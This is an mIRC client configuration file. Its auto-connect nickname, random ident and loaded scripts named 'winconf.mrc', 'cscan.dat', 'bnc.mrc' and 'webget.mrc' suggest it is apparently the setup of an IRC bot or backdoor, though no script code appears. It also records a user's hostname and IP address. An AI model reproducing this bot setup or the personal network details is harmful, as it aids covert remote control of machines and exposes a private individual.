[text]
commandchar=/
linesep=-
timestamp=[HH:nn]
accept=*.bmp,*.gif,*.jpg,*.log,*.mid,*.mp3,*.ogg,*.png,*.txt,*.wav,*.wma,*.zip
network=All
ignore=*.exe,*.com,*.bat,*.dll,*.ini,*.mrc,*.vbs,*.js,*.pif,*.scr,*.lnk,*.pl,*.shs,*.htm,*.html
[warn]
fserve=off
dcc=off
[options]
n0=0,0,0,1,0,0,300,0,0,0,1,0,0,0,2,1,0,2,0,0,4096,0,1,0,0,0,0,1,0,50,0,1
n1=5,100,0,0,0,0,0,0,3,1,1,1,0,0,1,1,1,1,0,0,1,1,1,0,5,0,0,0,0,0,1,0,0
n2=0,0,0,1,1,1,1,1,0,60,120,0,0,1,0,0,1,1,0,120,20,10,0,1,1,0,0,1,0,0,0,0,0
n3=5000,0,0,0,1,0,1,0,0,1,0,1,0,0,1,1,1,0,0,1,0,0,0,0,1,1,3,17,0,0,0,3,180
n4=1,0,1,0,0,3,9999,0,0,0,1,0,1024,0,1,9999,60,0,0,0,3,0,0,0,1,5000,1,5,0,0,3,0,1,1
n5=1,1,1,1,1,1,1,1,1,1,6667,0,0,0,0,0,1,0,300,30,10,0,0,26,0,0,0,8192,1,0,0,82
n6=0,0,11,1,1,1,0,1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,100,1,1,0,0,1,0,0,4,1,0
n7=0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,1,70,0,3,0,0,1,1,1,1,0,0,0,0,1,1,0
[about]
version=6.01
show=BR26354
[dirs]
[pfiles]
n0=popups.ini
n1=popups.ini
n2=popups.ini
n3=popups.ini
n4=popups.ini
[files]
servers=servers.ini
browser=C:\ARQUIV~1\INTERN~1\iexplore.exe
emailer=C:\ARQUIVOS DE PROGRAMAS\OUTLOOK EXPRESS\MSIMN.EXE
finger=finger.txt
urls=urls.ini
addrbk=addrbk.ini
[windows]
scripts=29,985,-7,703,0,0,0
main=337,294,286,231,2,1,0
wchannel=0,532,0,347,0,1,0
wserv=0,563,0,409,1,1,0
wdccs=-1,269,-1,271,0,1,0
wquery=84,563,84,409,1,1,0
wdccg=-1,269,-1,271,0,1,0
[ports]
random=off
bind=off
[ident]
active=yes
userid=vxylj
system=UNIX
port=113
[socks]
enabled=no
port=1080
method=4
dccs=no
useip=yes
[language]
sjis=0
multibyte=0
[clicks]
status=/lusers
query=/whois $$1
channel=/channel
nicklist=/query $$1
notify=/whois $$1
message=/whois $$1
[dde]
ServerStatus=on
ServiceName=mIRC
CheckName=off
[marker]
show=off
size=3
colour=4
method=1
[fileserver]
warning=off
[dccserver]
n0=0,59,0,0,0,0
[agent]
enable=0,0,0
char=merlin.acs
options=1,1,0,100,0
speech=150,60,100,1,180,10,50,1,1,1,0,50,1
channel=1,1,1,1,1,1,1,1,1
private=1,1,1,1
other=1,1,1,1,1,1,1
pos=20,20
[mirc]
user=lc hge2224
email=mtek
host=fchat.netdragons.netSERVER:fchat.netdragons.net:6667:nopass
nick=C1[12475]
[styles]
thin=3
font=0
hide=0
color=default
size=2
buttons=0
[colours]
n0=1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
[wizard]
warning=2
[editbox]
#externet=0,1,"@","",0
[findtext]
n0="DNS"
n1="nicks.txt"
n10="nix.txt"


[waves]
send=Event Beep
[dragdrop]
n0=*.wav:/sound $1 $2-
n1=*.*:/dcc send $1 $2-
s0=*.*:/dcc send $1 $2-
[extensions]
n0=defaultEXTDIR:download\
n1=*.wav,*.mid,*.mp3,*.wma,*.oggEXTDIR:sounds\
[local]
local=pc-62-31-122-47-ud.blueyonder.co.uk
localip=62.31.122.47
longip=1042250287
[afiles]
n0=aliases.ini

[rfiles]
n0=remote.ini
n1=remote.ini
n2=wincfg
n3=winconf.mrc
n4=cscan.dat
n5=bnc.mrc
n6=webget.mrc
n7=super.txt
